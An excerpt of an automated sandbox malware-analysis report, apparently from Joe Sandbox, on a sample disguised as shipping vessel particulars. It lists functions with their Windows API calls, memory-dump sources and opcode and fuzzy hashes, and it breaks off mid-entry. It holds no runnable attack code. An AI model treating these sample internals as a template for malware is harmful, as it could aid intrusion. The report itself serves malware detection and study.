                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • _malloc.LIBCMT ref: 0043215D
                              • _malloc.LIBCMT ref: 0043216F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _malloc$AllocateHeap
                              • String ID:
                              • API String ID: 680241177-0
                              • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                              • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                              • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                              • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                              Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                              Download Yara Rule
                              APIs
                              • TranslateMessage.USER32(?), ref: 00409556
                              • DispatchMessageW.USER32(?), ref: 00409561
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Message$DispatchPeekTranslate
                              • String ID:
                              • API String ID: 4217535847-0
                              • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                              • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                              • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                              • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                              Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 11f6b6e535ec7b80c381992ec33a5bd2d356ebd5842892795b93a7d01dafaf0a
                              • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                              • Opcode Fuzzy Hash: 11f6b6e535ec7b80c381992ec33a5bd2d356ebd5842892795b93a7d01dafaf0a
                              • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                              Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                              Download Yara Rule
                              APIs
                              • __wsplitpath.LIBCMT ref: 004678F7
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLast__wsplitpath_malloc
                              • String ID:
                              • API String ID: 4163294574-0
                              • Opcode ID: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                              • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                              • Opcode Fuzzy Hash: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                              • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                              Function 00467AC4 Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: a8f3b2a069b791166e01f79de9e5757f548ca94e92269194e8fe688370fda172
                              • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                              • Opcode Fuzzy Hash: a8f3b2a069b791166e01f79de9e5757f548ca94e92269194e8fe688370fda172
                              • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                              Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                              • _strcat.LIBCMT ref: 0040F786
                                • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                              • String ID:
                              • API String ID: 3199840319-0
                              • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                              • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                              • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                              • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                              Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                              • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                              • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                              • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                              Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              • __lock_file.LIBCMT ref: 00414A8D
                                • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                              • __fclose_nolock.LIBCMT ref: 00414A98
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                              • String ID:
                              • API String ID: 2800547568-0
                              • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                              • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                              • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                              • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                              Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                              Download Yara Rule
                              APIs
                              • __lock_file.LIBCMT ref: 00415012
                              • __ftell_nolock.LIBCMT ref: 0041501F
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                              • String ID:
                              • API String ID: 2999321469-0
                              • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                              • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                              • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                              • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                              Function 03F1E538 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 03F1DDA8: GetFileAttributesW.KERNELBASE(?), ref: 03F1DDB3
                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 03F1E667
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AttributesCreateDirectoryFile
                              • String ID:
                              • API String ID: 3401506121-0
                              • Opcode ID: 96a425f63008aa5d8586ebd0b0edae7eacd26f049704a72ab2b2fecfa9277b2c
                              • Instruction ID: 0042a4b7a47e82483e3bb131c3fe1f1420e92d40bcf3856be091fef1094406dc
                              • Opcode Fuzzy Hash: 96a425f63008aa5d8586ebd0b0edae7eacd26f049704a72ab2b2fecfa9277b2c
                              • Instruction Fuzzy Hash: 1B51A631E1020D96EF14EFB0D945BEF7379EF58300F0045A9A909E7280EB79AB54CBA5
                              Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 64fdff3ae94ab83457d8603152ae0d5fedf77ee6c12e0e45d0860bef15caa14f
                              • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                              • Opcode Fuzzy Hash: 64fdff3ae94ab83457d8603152ae0d5fedf77ee6c12e0e45d0860bef15caa14f
                              • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                              Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                              Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                              • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                              • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                              • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                              Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                              • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                              • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                              • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                              Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __lock_file
                              • String ID:
                              • API String ID: 3031932315-0
                              • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                              • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                              • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                              • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                              Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                              Download Yara Rule
                              APIs
                              • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                              • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                              • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                              • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                              Function 03F1DDA8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                              Download Yara Rule
                              APIs
                              • GetFileAttributesW.KERNELBASE(?), ref: 03F1DDB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                              • Instruction ID: 904c6375b5b40a4aef5bad50c18cfd8e65c632072b7431d078b222ea8b0a97e8
                              • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                              • Instruction Fuzzy Hash: 2FE08C3191960CEBCF20CBA8E904AF973B8EB04320F104658B806C32C0D5308A20D750
                              Function 03F1DD78 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              • GetFileAttributesW.KERNELBASE(?), ref: 03F1DD83
                              Memory Dump Source
